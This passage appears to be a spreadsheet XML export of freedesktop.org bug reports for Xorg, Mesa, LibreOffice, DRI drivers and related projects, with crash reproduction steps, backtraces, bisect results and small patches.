  commit ea508c177c961ba2f00129476a22a32ff3ea6f1b
  Author: Chris Wilson 
  Date:   Thu Jul 4 20:19:20 2013 +0100
      sna: Set 1024x768 fb in absence of any connected devices
      No actual initial configration magic is required all we need to do is
      set the initial framebuffer size with no connected outputs and leave it
      to the core to select CompatOutput() the like.
      Signed-off-by: Chris Wilson 
  :040000 040000 9ed8e6c7baee59c48687bec00e15b4d878780a9e 0c6e5509fa6a22161e8302303932f04783b486f3 M	src
Running Linux 3.9.11 xorg-server 1.14.2.</t>
  </si>
  <si>
    <t>LIBBSD-34511</t>
  </si>
  <si>
    <t>arc4random_uniform not listed in headers</t>
  </si>
  <si>
    <t>bsd/stdlib.h should include
u_int32_t arc4random_uniform(u_int32_t upper)
which is currently provided by libbsd but as far as I can tell not listed in any of the headers.</t>
  </si>
  <si>
    <t>florob</t>
  </si>
  <si>
    <t>DRI-32288</t>
  </si>
  <si>
    <t>[bisected piketon] changing resolution cause ut2004 to hang with VGA and compiz enabled</t>
  </si>
  <si>
    <t>Created attachment 40982
dmesg file
System Environment:
--------------------------
Arch:           x86_64
Platform:       piketon
Libdrm:		(master)2.4.22-21-g537703fd4805e9cd352965fce642670986822d22
Mesa:		(master)05e534e6c4395269b1ca3a9694a1f437363dd186
Xserver:  (server-1.9-branch)xorg-server-1.9.2.902
Xf86_video_intel: (master)2.13.901-25-g9b967807c2d240488a715509649663aac3583532
Kernel:	(drm-intel-fixes) 1b39d6f37622f1da70aa2cfd38bfff9a52c13e05
Bug detailed description:
------------------------
The game hangs when change resolution or exit the game. It's not GPU hang. No issue happens if compiz disabled. It's kernel regression. 
Backtrace:
#0  0x0000003c102d7dd8 in poll () from /lib64/libc.so.6
#1  0x00007fcd39cdb87a in _xcb_conn_wait (c=0x1a19ea0 cond= vector=0x0 count=0x0) at xcb_conn.c:306
#2  0x00007fcd39cdd57a in xcb_wait_for_event (c=0x1a19ea0) at xcb_in.c:437
#3  0x00007fcd3a146bc8 in _XReadEvents (dpy=0x1a18980) at xcb_io.c:342
#4  0x00007fcd3a13420f in XMaskEvent (dpy=0x1a18980 mask=131072 event=0x7fffaf26e170) at MaskEvent.c:75
#5  0x00007fcd3a74d3dc in ?? ()
#6  0x0000000001a25370 in ?? ()
#7  0x00007fcd3a14685f in _XFreeReplyData (dpy=0x1a18390 rep=0x7fffaf26e170 extra=0 discard=1) at xcb_io.c:490
#8  _XReply (dpy=0x1a18390 rep=0x7fffaf26e170 extra=0 discard=1) at xcb_io.c:648
#9  0x00007fcd3a142013 in XSync (dpy=0x1a23dc0 discard=0) at Sync.c:44
#10 0x0000000090000002 in ?? ()
#11 0x0000000001a18790 in ?? ()
#12 0x0000000001a18390 in ?? ()
#13 0x0000000090000002 in ?? ()
#14 0x00007fcd3a74fcb6 in ?? ()
#15 0x0000000000000000 in ?? ()
Bisect shows the first bad commit is 1b39d6f37622f1da70aa2cfd38bfff9a52c13e05.
Author:     Chris Wilson 
AuthorDate: Mon Dec 6 11:20:45 2010 +0000
Commit:     Chris Wilson 
CommitDate: Tue Dec 7 22:46:11 2010 +0000
    drm/i915/dp: Only apply the workaround if the select is still active
    As we may try to power down the link at various times it is not
    necessarily still coupled with an encoder and so we must be careful not
    to depend upon an operation that is only valid when the link is still
    attached to a pipe.
    Fixes regression in 5bddd17.
Reproduce steps:
----------------
1. run ut2004
2. exit the game or change resolution in game settins.</t>
  </si>
  <si>
    <t>MESA-99552</t>
  </si>
  <si>
    <t>Make Advanced Simulation Library (ASL) OpenCL GPU support work on Clover and RadeonSI</t>
  </si>
  <si>
    <t>Advanced Simulation Library (ASL) is a partial differential equation solver that supports running with OpenCL. When using it on Mesa/radeonsi/LLVM/AMDGPU test/testACL/testKernel.cc [1] partially works but ultimately fails with:
$ ./testKernel
Test of copy function... Ok
Test of Kernel with double... Ok
Test of KernelSIMD... Ok
Test of KernelSIMDUA... Ok
Test of kernel with PrivateVariable... Ok
Test of kernel with PrivateArray...
                        BUILD LOG
 ************************************************
:0:0: in function compute_4 void (i32 addrspace(1)* float addrspace(1)*): invalid addrspacecast
 ************************************************
                        KERNEL SOURCE CODE
 ------------------------------------------------
#pragma OPENCL EXTENSION cl_khr_fp64 : disable
__kernel void compute_4(__global int *a_i1
                        __global float *a_f8)
{
        uint index = get_global_id(0)
        float pa_f1[6] = {-9 2 0 15 1 3}
        (a_f8[index]=pa_f1[a_i1[index]])
}
 ------------------------------------------------
terminate called after throwing an instance of 'std::logic_error'
  what():  ASL ERROR: Program::build() (-11).
Aborted (core dumped)
[1] https://github.com/AvtechScientific/ASL/blob/master/test/testACL/testKernel.cc</t>
  </si>
  <si>
    <t>LIBREOFFICE-38187</t>
  </si>
  <si>
    <t>Functionality request: When exporting .odt to .pdf: add hyperlink for each endnote to return back to main text</t>
  </si>
  <si>
    <t>If I take a .odt document and have Writer export it as a .pdf the endnotes are only hyperlinked to the footnote text in one direction: from the text proper to the endnote section. However the reverse is not true: the endnote itself does not have a return hyperlink which should return the reader to the place in the text proper where the footnote was inserted. Now if one clicks on a footnote in the text the reader must scroll all the way back through the document to find the place where they left off reading.
In the .odt text the hyperlinked endnote travels in both directions which makes reading much easier. 
I hope that makes sense!</t>
  </si>
  <si>
    <t>cathect</t>
  </si>
  <si>
    <t>XORG-12830</t>
  </si>
  <si>
    <t>Xkb cleanup deferences released pointer</t>
  </si>
  <si>
    <t>While experimenting with an attempt to create a Xserver crash recovery environment/patch I found this clear bug. The problem is that xkb/xkbEvents.c:XkbRemoveResourceClient() deferences the dev-&gt;key-&gt;xkbInfo field
but this field has been already released earlier in dix/devices.c:CloseDevice()</t>
  </si>
  <si>
    <t>XORG-13037</t>
  </si>
  <si>
    <t>evdev and cherry keyboard: no arrow keys</t>
  </si>
  <si>
    <t>i switched to evdev and the perixx game-mouse with seven buttons (http://www.perixx.com) now works absolutely fine. however my old perixx keyboard didn't work with evdev at all. it has a very slim layout with all keys present just once. the evdev driver triggered the alt key non-stop so that if i typed something menues and dialogs popped up randomly. the keyboard was not to mention so or so. i now have a cherry evolution stream which seems to be very good. however. with evdev the arrow keys the window keys and the multimedia keys are dead. the arrow keys on the numpad work. also evdev doesn't recognize the german keyboard layout by itself (why is 'us' default? the default should be none or locale!) here's the xorg and the proc output:
Section InputDevice
	Identifier  Keyboard0
#	Driver      evdev
#	Option      Name HID 046a:0023
	Driver      kbd
	Option      XkbModel  pc105
	Option      XkbLayout de
EndSection
Section InputDevice
	Identifier  Mouse0
#	Driver mouse
#	Option Device /dev/psaux
	Driver      evdev
	Option      Name   HID 04d9:0461
EndSection
I: Bus=0003 Vendor=04d9 Product=0461 Version=0110
N: Name=HID 04d9:0461
P: Phys=usb-0000:00:10.0-1/input0
S: Sysfs=/devices/pci0000:00/0000:00:10.0/usb5/5-1/5-1:1.0/input/input3
U: Uniq=
H: Handlers=mouse0 event3 
B: EV=7
B: KEY=1f0000 0 0 0 0 0 0 0 0
B: REL=103
I: Bus=0003 Vendor=046a Product=0023 Version=0111
N: Name=HID 046a:0023
P: Phys=usb-0000:00:10.0-2/input0
S: Sysfs=/devices/pci0000:00/0000:00:10.0/usb5/5-2/5-2:1.0/input/input4
U: Uniq=
H: Handlers=kbd event4 
B: EV=120003
B: KEY=7 ff800000 7ff e0b2ffdf 1cfffff ffffffff fffffffe
B: LED=1f
I: Bus=0003 Vendor=046a Product=0023 Version=0111
N: Name=HID 046a:0023
P: Phys=usb-0000:00:10.0-2/input1
S: Sysfs=/devices/pci0000:00/0000:00:10.0/usb5/5-2/5-2:1.1/input/input5
U: Uniq=
H: Handlers=kbd event5 
B: EV=f
B: KEY=7fff ac3027 bf004444 0 0 1 f80 8a37c400 667bfa d971dfed 9e0000 0 0 0
B: REL=40
B: ABS=1 0</t>
  </si>
  <si>
    <t>LIBREOFFICE-64916</t>
  </si>
  <si>
    <t>[FILEOPEN] LO 4.1 beta1: missing libsqlite3.so prevents encrypted files from loading</t>
  </si>
  <si>
    <t>Created attachment 79709
Encryped file. Password is 1111
Hey
LO 4.1 beta1 can't open any encrypted document. If I try I get standard dialog (The password is incorrect. The file cannot be opened).
If I try save encrypted file I got:
Error saving the document Untitled2:
General Error.
General input/output error.
I attach exampled of file. Password is 1111.</t>
  </si>
  <si>
    <t>LIBREOFFICE-83178</t>
  </si>
  <si>
    <t>Tools - Language - Chinese Conversion... crashes</t>
  </si>
  <si>
    <t>Observed on OSX 10.9.4 / LO 4.3.0.4 and master
Steps to reproduce:
1. Create a new Writer document containing å•Š
2. Select all
3. Open Tools - Language - Chinese Conversion... (requires Asian language support to be enabled in Options - Language Settings - Languages)
4. Click on OK (Conversion Direction can be either way)
However this only occurs on my own build and not the release build of 4.3.0.4. This could be a result of differences in the build environment (release builds are still built on 10.6 ...) or the fact that assertions are not enabled for release</t>
  </si>
  <si>
    <t>LIBFPRINT-45513</t>
  </si>
  <si>
    <t>Remove duplicate rule in .rules file</t>
  </si>
  <si>
    <t>$ wc -l 60-fprint-autosuspend.rules 
17 60-fprint-autosuspend.rules
$ sort 60-fprint-autosuspend.rules | uniq | wc -l
16</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-13934</t>
  </si>
  <si>
    <t>add nodeadkeys variant to machitosh / fr</t>
  </si>
  <si>
    <t>Hello and happy new year. Here is a bug reported on Debian's BTS.
Would it be possible to include a nodeadkeys variant for the french layout 
on macintosh model keyboards ?
I wrote the a patch for symbols/macintosh_vndr/fr that you can find in 
attachment. It works here. Probably a corresponding line in rules/base.lst 
needs also to be added.</t>
  </si>
  <si>
    <t>LIBREOFFICE-61952</t>
  </si>
  <si>
    <t>FORMATTING: crash when switching between left and right page</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. set a page to left page
2. switch the page to right page
3. crash LibreOffice document can be recovered
If you switch to another profile like standard then there is no problem. 
Operating System: Windows 7
Version: 4.0.1.2 release
Last worked in: 3.6.3.2 release</t>
  </si>
  <si>
    <t>CAIROMM-5982</t>
  </si>
  <si>
    <t>MAINTAINERS file not included in releases</t>
  </si>
  <si>
    <t>The released tarballs built with make dist do not include the MAINTAINERS
file as it is not listed in Makefile.am EXTRA_DIST rule.</t>
  </si>
  <si>
    <t>LIBREOFFICE-54686</t>
  </si>
  <si>
    <t>Numbers with percent signs not detected as numbers in French</t>
  </si>
  <si>
    <t>Bug 41015 added automatic insertion of a non-break space before percent signs in French because this is what our typographics rules say. This introduced a small regression in Calc because now numbers with percent signs are considered as text not as numbers formatted as percents.
This is related to a problem with the percents cell format which does not include the non-break space between numbers and the % sign. Maybe fixing this would also fix the detection issue.?</t>
  </si>
  <si>
    <t>MESA-108500</t>
  </si>
  <si>
    <t>Crash when creating a depth buffer on GeForce 320M</t>
  </si>
  <si>
    <t>Created attachment 142101
glxinfo
Every OpenGL application that wants to use a depth buffer always crashes including glxgears:
glxgears: dri2.c:906: dri2_allocate_textures: Assertion `*zsbuf' failed.
I debugged the assertion with gdb:
templ structure contents passed to resource_create():
$2 = {reference = {count = 0} width0 = 300 height0 = 300 depth0 = 1 array_size = 1 format = PIPE_FORMAT_Z24X8_UNORM
  target = PIPE_TEXTURE_2D last_level = 0 nr_samples = 0 nr_storage_samples = 0 usage = 0 bind = 1 flags = 0
  next = 0x0 screen = 0x0}
In nv50_miptree_create() in gallium/drivers/nouveau/nv50/nv50_miptree.c:389
the call to nouveau_bo_new() returns -22 that causes it to return NULL. 
MESA_DEBUG=1 glxgears prints the following before segfaulting:
Mesa: User error: GL_OUT_OF_MEMORY in Resizing framebuffer
Computer: MacBook Pro 2010 (NVIDIA GeForce 320M MCP89)
Resolution: 1280x800
OS: Lubuntu 18.10
Mesa: 18.2.2 but happens also with the versions that come with Lubuntu 16.04 and 18.04
I can compile and run mesa from sources if it helps debugging.</t>
  </si>
  <si>
    <t>MESA-50621</t>
  </si>
  <si>
    <t>Mesa fails its test suite with a buffer overflow.</t>
  </si>
  <si>
    <t>Created attachment 62429
log of the build process
I'm using Gentoo Linux an an amd64 box with gcc-4.7.0. When building mesa I see the following buffer overflow error in the test suite.
[ RUN      ] glXCreateContextAttribARB_test.NULL_display_returns_None
*** buffer overflow detected ***: glx_unittest - terminated
glx_unittest: buffer overflow attack in function  - terminated
Report to http://bugs.gentoo.org/
/bin/sh: line 5: 13934 Killed                  ${dir}$tst
FAIL: glx_unittest
I first reported this issue at [1]. If any further information or action is required please tell me.
[1] https://bugs.gentoo.org/show_bug.cgi?id=418161</t>
  </si>
  <si>
    <t>oehme.markus</t>
  </si>
  <si>
    <t>XORG-7414</t>
  </si>
  <si>
    <t xml:space="preserve">gccmakedep mutilates arguments containing ' or  * </t>
  </si>
  <si>
    <t>When compiling Xorg-6.9.0 I noticed 78 strange gcc warnings that are
due to the fact that the gccmakedep shell script mutilates arguments passed on
to gcc if the contain ' and/or  * .
The attached patch fixes this problem (and is inspired by the way
autoconf/configure handles the very same problem).
The second part of the patch might be useless because filenames containing
blanks will probably fail at many other places.</t>
  </si>
  <si>
    <t>LIBQMI-99495</t>
  </si>
  <si>
    <t>[PATCH] Fix building under musl-libc</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 129097
fix-unknown-fd_set.patch
- Include sys/select.h in utils/swi-update.c to fix unknown type name 'fd_set'
- fixes building under musl-libc in Alpine Linux:
- https://github.com/alpinelinux/aports/pull/781
---
--- libqmi-1.17.900/utils/swi-update.c
+++ libqmi-1.17.900/utils/swi-update.c.new
@@ -406 +407 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include </t>
  </si>
  <si>
    <t>TELEPATHY-57615</t>
  </si>
  <si>
    <t>Miscellaneous clean-up.</t>
  </si>
  <si>
    <t>Mostly using the WockyNode APIs more neatly.</t>
  </si>
  <si>
    <t>XORG-104630</t>
  </si>
  <si>
    <t>evdev driver incorrectly handles devices with only buttons</t>
  </si>
  <si>
    <t>Created attachment 136719
proposed fix
When a input device with only buttons is present (e.g. BTN_0..BTN_9) in Xorg.log I can see the following:
evdev: Huion HA60-F400 Tablet Pad: Device: /dev/input/event3
evdev: Huion HA60-F400 Tablet Pad: Vendor 0x256c Product 0x6e
evdev: Huion HA60-F400 Tablet Pad: Found 16 mouse buttons
evdev: Huion HA60-F400 Tablet Pad: Forcing relative x/y axes to exist.
evdev: Huion HA60-F400 Tablet Pad: Configuring as mouse
evdev: Huion HA60-F400 Tablet Pad: YAxisMapping: buttons 4 and 5
evdev: Huion HA60-F400 Tablet Pad: EmulateWheelButton: 4 EmulateWheelInertia: 10 EmulateWheelTimeout: 200
However xinput list will show the device listed as a slave of Virtual core keyboard. As a consequence GIMP fails to show this device in the extended input device dialog (don't ask me why) and Plasma5 crashes when you do xinput test  (also don't ask me why). Anyways if it is Configuring as mouse I would expect it to be a slave of Virtual core pointer.
A inspection of the evdev driver revealed a small mistake: the relative X and Y axes are added to the device but EVDEV_RELATIVE_EVENTS flag is not set. This leads to the above described effects.
The small attached patch fixes this.</t>
  </si>
  <si>
    <t>zapparello</t>
  </si>
  <si>
    <t>XORG-61822</t>
  </si>
  <si>
    <t>X crashes with T60p / docking station with HD4650 / 3.8.x kernel</t>
  </si>
  <si>
    <t>I've already raised this bug as:
https://bugzilla.kernel.org/show_bug.cgi?id=54821
Except that it occurs to me that it might be an Xorg driver bug instead. A copy-and-paste of the bug's description follows:
---------------------------------------------------------------------------
I have a Lenovo T60p laptop that has a built-in M66GL chip. Typically this
laptop is docked into a docking station that has a HD4650 card in a x1 (I
think) PCIe slot. There is currently no monitor connected to the HD4650.
A vanilla 32 bit 3.8.2 kernel does not boot on this laptop so long as the
laptop remains docked. (It boots OK when undocked though). The boot process
seems to hang instead although it will still perform an ACPI shutdown when I
press the power button. This hang happens with run-level 5 but not with
run-level 3.
The Fedora kernel-3.8.1-201.fc18.i686 package doesn't hang on boot but the X
server crashes instead.
A vanilla 3.7.10 boots normally regardless of whether the laptop is docked or
undocked.
dmesg logs xorg.conf and Xorg.0.log files are attached to BKO #54821.</t>
  </si>
  <si>
    <t>MESA-110432</t>
  </si>
  <si>
    <t>dEQP-VK tests running very long time</t>
  </si>
  <si>
    <t xml:space="preserve">Some of the dEQP-VK tests spend a lot of time in compiler. In particular these 2 ones are heavily affected:
dEQP-VK.spirv_assembly.instruction.graphics.8bit_storage.32struct_to_8struct.storage_buffer_sint_geom
dEQP-VK.spirv_assembly.instruction.graphics.8bit_storage.32struct_to_8struct.storage_buffer_uint_geom
Normally with old Mesa take take 2-3 secs to complete but with current git I measured today 38 minutes 43 seconds (!)
I've bisected this to following commit:
-------------- 8&lt; -----------------------------
commit b031c643491a92a5574c7a4bd659df33f2d89bb6
Author: Ian Romanick 
Date:   Thu Jan 17 17:53:40 2019 -0800
    nir: Convert a bcsel with only phi node sources to a phi node
    v2: Remove the original ALU instruciton after all of its readers are
    modified to read the new ALU instruction.
    v3: Fix an issue where a bcsel that may not be executed on a loop
    iteration due to a break statement is converted to a phi (and therefore
    incorrectly executed).  Noticed by Tim.
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=109216
    Fixes: 8fb8ebfbb05 (intel/compiler: More peephole select)
    Reviewed-by: Timothy Arceri </t>
  </si>
  <si>
    <t>LIBREOFFICE-82047</t>
  </si>
  <si>
    <t>Delete row - Undo change range of cell name</t>
  </si>
  <si>
    <t>Not sure if it's been reported before but I didn't find any.
Steps to reproduce:
1. In new spreadsheet select cells A1:A2
2. Insert &gt; Names &gt; Define
3. Type: TEST in 'Name' &gt; Add
4. Select row 2 &gt; Right-click &gt; Delete Selected Rows
5. Undo
Actual result: range for TEST changed to $Sheet1.$A$1:$A$3
Expected result: cell name TEST should keep $Sheet1.$A$1:$A$2 in range
Reproduced with: 4.2.0.0.beta1 4.3.1.0.0+ Time: 2014-07-30_10:54:10
Not reproduced with: 4.1.6.2
*) Bug not occured if we delete row 1 in step 4
Tested on Ubuntu 12.04 32bit</t>
  </si>
  <si>
    <t>XORG-32489</t>
  </si>
  <si>
    <t>[Xext/sync.c] gnome-screensaver ignores input when fading to black</t>
  </si>
  <si>
    <t>When gnome-screensaver starts fading to black it's not interruptible. Mouse and keyboard events are ignored and screensaver anyway start.
This bug was also reported at
Fedora: https://bugzilla.redhat.com/show_bug.cgi?id=612620
Ubuntu: https://bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/595555
Arch Linux: https://bugs.archlinux.org/task/20732
GNOME developers said that it's not a gnome-screensaver bug:
https://bugzilla.gnome.org/show_bug.cgi?id=625374
There are two patches that fixes this problem:
Fedora patch: https://bugzilla.redhat.com/attachment.cgi?id=460990
Ubuntu patch: http://bazaar.launchpad.net/~ubuntu-branches/ubuntu/natty/xorg-server/natty/annotate/head:/debian/patches/204_fix-neg-sync-transition.patch</t>
  </si>
  <si>
    <t>DBUS-10153</t>
  </si>
  <si>
    <t>dbus daemondir needs to be in pc file</t>
  </si>
  <si>
    <t>A while back I submitted a patch to add --with-daemondir to the dbus package so that you can specify the location of where the dbus-daemon is installed.  
However the attached two patches (one for dbus and the other for dbus-glib) are needed so that dbus-glib can find the location of the daemon so it can run it.  The dbus patch adds dbus_daemondir to the dbus-1.pc file and the dbus-glib patch gets the value in the configure script and passes it into the tools/Makefile.am
Previously we were patching our build to just hack the tools/Makefile.am run the daemon in the /usr/lib directory but these patches work more properly.
Without these patches the --with-daemondir option doesn't really work without hacking tools/Makefile.am in dbus-glib by hand.</t>
  </si>
  <si>
    <t>LIBREOFFICE-65485</t>
  </si>
  <si>
    <t>Tabs names and window titles in Character Paragraph B&amp;N Title Page dialogs are now in English</t>
  </si>
  <si>
    <t>Even though these were long localized since they were transformed to GTK the window title and tab names of Character and Paragraph dialogs are now in English and nonlocalizable (in 41b2). Same goes with the Bullets &amp; Numbering dialog.
Besides the Character tab Hyperlink has all labels/buttons in English as well as tabs Outline &amp; Numbering in the Paragraph dialog.
Besides the Page dialog has tab names localized but tabs Columns and Footnote have all strings in English ...
The Title page dialog is fully English. Also the Columns dialog selectable in LO Writer from the Format menu.
This is a nightmare to a localizers eyes to a localizer who keeps his work at 100 % all the time. No excuse for this.</t>
  </si>
  <si>
    <t>XORG-15481</t>
  </si>
  <si>
    <t>Nouveau on nVidia Corporation G71 [GeForce 7950 GT]: works but lockup for 6 min at shutdown</t>
  </si>
  <si>
    <t>Created attachment 15870
glxinfo output
Yesterday I've extracted everything related to nouveau from git repositories. That is:
       1) drm
       2) xf86-video-nouveau
       3) mesa (in a second step see below)
Build everything made the drm and nouveau module auto load at startup then changed my xorg.conf (attached).
Immediately I did see huge 2D performance improvement but noticed running glxgears that 3D was not there. Confirmed by the message in Xorg.log.0 about AIGLX. I then started to add
Section ServerFlags
        Option AIGLX on
EndSection
But when restarting X the machine hang for quite a long time. It is not dead as I can ping it or event ssh to it. But you do not have any keyboard input (even caps lock led).
I then decided to be adventurous and try the 3D. And managed to install it. I now have some basic 3D acceleration except that if I magnify Glxgears it gets a sigsegv.
But the not fatal hang for 6 min at shutdown remains. The last message I see before it really starts printing garbled init 0 message again is the failed to idle channel 1 before destroy. Prepare for strangeness.</t>
  </si>
  <si>
    <t>eric.valette</t>
  </si>
  <si>
    <t>LIBREOFFICE-33756</t>
  </si>
  <si>
    <t>CALC crashes after shrinking a selection containing a hidden column</t>
  </si>
  <si>
    <t>OS: Windows XP Professional Version 2002 SP2
HW: Intel Core2 Duo CPU E6750 Asus P5KC motherboard 4 GB RAM
App: LibreOffice 3.3.0 OOO330m19 (Build:6) tag libreoffice-3.3.0.4
Custom install with only English and Hungarian dictionaries/language packs
How to reproduce the crash:
Here is my table containing data only in A1-C1 (I show the headings as well):
  A B C
1 1 2 3
Hide the B column. Now it looks like:
  A C
1 1 3
Then make A1 active and press Ctrl+Shift+Right-Arrow to select A1..C1. (It is already buggy here because instead of selecting A1..C1 it selects A1..D1 apparently the hidden column confuses Calc!) Then Ctrl+Shift+Left-Arrow to shrink selection to A1..C1 then again Ctrl+Shift+Left-Arrow to CRASH!!!</t>
  </si>
  <si>
    <t>felix.kovacs</t>
  </si>
  <si>
    <t>XORG-32005</t>
  </si>
  <si>
    <t>[arrandale] [eDP] blank screen after KMS kernel 2.6.36</t>
  </si>
  <si>
    <t>Created attachment 40677
patch against black screen problem against kernel 2.6.36
As a kernel upgrade 2.6.36.1 arrived for the arch linux repositories.
As soon as i915 enters KMS my laptop(HP proBook 5320m) screen stays black not even backlight.
I bisect the problem to this commit:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.gita=commitdiffh=7643a7fa16edf180d593f705f4fa5930c40e8d2d
and also created a patch against 2.6.36 which reverts this commit and works so far for me.</t>
  </si>
  <si>
    <t>peinthor</t>
  </si>
  <si>
    <t>DRI-107881</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@kms_plane_scaling@pipe-b-scaler-with-rotation - fail - Failed assertion: ret == 0 Last errno: 22 Invalid argument</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_106/fi-icl-u/igt@kms_plane_scaling@pipe-a-scaler-with-rotation.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_106/fi-icl-u/igt@kms_plane_scaling@pipe-b-scaler-with-rotation.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_106/fi-icl-u/igt@kms_plane_scaling@pipe-c-scaler-with-rotation.html
(kms_plane_scaling:2404) igt_kms-CRITICAL: Test assertion failure function do_display_commit file ../lib/igt_kms.c:3282:
(kms_plane_scaling:2404) igt_kms-CRITICAL: Failed assertion: ret == 0
(kms_plane_scaling:2404) igt_kms-CRITICAL: Last errno: 22 Invalid argument
(kms_plane_scaling:2404) igt_kms-CRITICAL: error: -22 != 0</t>
  </si>
  <si>
    <t>LIBREOFFICE-36991</t>
  </si>
  <si>
    <t>crash when duplicating draw page with linked wmf pictures</t>
  </si>
  <si>
    <t>Created attachment 46465
Contains the crashing document and the linked picture
Try to open the attached document. It crashes immediately.
How to reproduce:
Take a new Draw document.
Insert the attached wmf picture _linked_.
Insert it once again linked.
Insert &gt; Duplicate Slide
Crash.
The crash does not happen with png-pictures.
I can reproduce the crash not only with this special wmf-picture but with others too.</t>
  </si>
  <si>
    <t>DRI-74704</t>
  </si>
  <si>
    <t>[Bisected]All Intel_gpu_tools cases fail with *ERROR* Attempting to mmap a purgeable buffer when run nightly testing</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: Broadwell
kernel    (drm-intel-nightly)8f5284d0165252f41609a97acc2755234b22cf15
Bug detailed description:
-----------------------------
All igt cases fail when nightly testing.
Fail with following error:
[ 4098.078903] [drm:i915_gem_mmap_gtt] *ERROR* Attempting to mmap a purgeable buffer
[ 4098.079040] [drm:i915_gem_object_get_pages] *ERROR* Attempting to obtain a purgeable object
[ 4098.079173] [drm:i915_gem_object_get_pages] *ERROR* Attempting to obtain a purgeable object
Run any case via manually this error is not replicable.
Test log:
@test: Piglit_igt/igt_kms_flip_absolute-wf_vblank
info: @@@Returncode: 0
test case start at: Thu Dec 12 01:08:08 2013
test case end at:   Thu Dec 12 01:08:51 2013
Errors:
Dmesg:
[ 4098.078903] [drm:i915_gem_mmap_gtt] *ERROR* Attempting to mmap a purgeable buffer
[ 4098.079040] [drm:i915_gem_object_get_pages] *ERROR* Attempting to obtain a purgeable object
[ 4098.079173] [drm:i915_gem_object_get_pages] *ERROR* Attempting to obtain a purgeable object
Output:
IGT-Version: 1.5-g971c7db (x86_64) (Linux: 3.13.0_drm-intel-nightly_8f5284_20140208+ x86_64)
Using monotonic timestamps
Beginning absolute-wf_vblank on crtc 3 connector 10
  1920x1080 60 1920 1966 1996 2080 1080 1082 1086 1112 0xa 0x48 138780
........................................................
absolute-wf_vblank on crtc 3 connector 10: PASSED
Beginning absolute-wf_vblank on crtc 5 connector 10
  1920x1080 60 1920 1966 1996 2080 1080 1082 1086 1112 0xa 0x48 138780
...........................................................
absolute-wf_vblank on crtc 5 connector 10: PASSED
Beginning absolute-wf_vblank on crtc 7 connector 10
  1920x1080 60 1920 1966 1996 2080 1080 1082 1086 1112 0xa 0x48 138780
...........................................................
absolute-wf_vblank on crtc 7 connector 10: PASSED
Subtest absolute-wf_vblank: SUCCESS
returncode: 0
summary: Intel_gpu_tools/igt_kms_flip_absolute-wf_vblank    FAIL</t>
  </si>
  <si>
    <t>XORG-2006</t>
  </si>
  <si>
    <t>XEmbed client doesn't receive key events from XIM</t>
  </si>
  <si>
    <t>(For those how is unfamiliar with XEmbed see
http://www.freedesktop.org/wiki/standards/xembed-spec)
Use the attached GTK XEmbed test. To run it start ./gtk-embedder then click on
Add Active GTK+ Child the child with text field will appear. Try to input
some text into it using different techniques enable/disable IM - nothing helps
you can't inputanything. The only way I found is to click by right mouse button
when IM is enabled(put focus back into embedder's textfield press Ctrl-space
then click into client's text field) then the window with on-screen
keyboard appears and I am able to input English letters.
Similarly to GTK Java 1.5.0 based applets are unable to receive any input in
the locales XIM is enabled when they are run in the version of Mozilla with
XEmbed enabled plugins.</t>
  </si>
  <si>
    <t>yakiudon</t>
  </si>
  <si>
    <t>LIBREOFFICE-59867</t>
  </si>
  <si>
    <t>Windows 8 assigned an LCID to Catalan Valencian</t>
  </si>
  <si>
    <t>In Windows 8 LCID of Catalan Valencian (ca-ES-valencia) is 0x0803. In LibreOffice we use 0x8003 a user defined value.</t>
  </si>
  <si>
    <t>DRI-84615</t>
  </si>
  <si>
    <t>[SNB gt1] GPU HANG: ecode 0:0x85fffffc on Intel P3000 (Xeon E3 V1) on first X startup</t>
  </si>
  <si>
    <t>Created attachment 107241
GPU hang crash dump after X startup from /sys/class/drm/card0/error
When I start X dmesg throws an GPU ring hang / reset message similar to #76368. But it isn't fixed for me and setting i915.enable_ppgtt=0 changes nothing.
When starting Awesome WM draws its menus with a little delay and not correctly a quick restart solves this. Starting gnome 3 there's a longer delay (~5-8 sec) showing only a black screen but after that it starts (or restarts?) normally.
Used kernels: Arch Linux default 3.16 and mainline 3.17-rc6.</t>
  </si>
  <si>
    <t>mauorrizze</t>
  </si>
  <si>
    <t>LIBREOFFICE-35938</t>
  </si>
  <si>
    <t>UI - Picture Caption... dialog not remembering Separator textbox value</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Run the LibO Writer.
2. Insert any picture.
3. Open the Caption... picture dialog from the popup menu.
4. Set the separator to  -  without quotation marks.
5. Press OK.
6. Open the dialog again.
Actual results:
Separator is : 
Expected results:
Separator is  - 
Additional information:
Our university standards require separators to be dashes so this bug is very annoying. This behavior persists since OpenOffice.org version 2.x or maybe even earlier.</t>
  </si>
  <si>
    <t>jaigner</t>
  </si>
  <si>
    <t>coffeecup.winner</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-4693</t>
  </si>
  <si>
    <t>hu(101_qwerty_comma_nodead) not working</t>
  </si>
  <si>
    <t>Hi
I attach a patch to the Hungarian keyboard layout please apply it. It modifies
two things:
1. Currently 4 variants include hu(def_comma) while 4 others include
keypad(comma) for exactly the same purpose. This is at least inconsistent
but I backported this layout file to X.Org 6.8.1 and found that the attempt to
use keypad(comma) fails while hu(def_comma) (which is prefixed by a pc/
path component there) works perfectly. So I changed all the 4 occurances of
keypad(comma) to hu(def_comma) and now all the variants work perfectly.
So I'm not pretty sure it's only a guess that these 4 variants still do not
work with current cvs but even if it's fixed now in some other files bringing
this file into a more consistent state couldn't hurt anyway.
2. Fix inconsistent and sometimes really ugly indentation.
Thanks.</t>
  </si>
  <si>
    <t>DRI-97929</t>
  </si>
  <si>
    <t>[BAT][SKL] igt/kms_*: [drm:skl_set_cdclk] *ERROR* failed to inform PCU about cdclk change</t>
  </si>
  <si>
    <t>XORG-25554</t>
  </si>
  <si>
    <t>i830_uxa_prepare_access: gtt bo map failed: Input/output error</t>
  </si>
  <si>
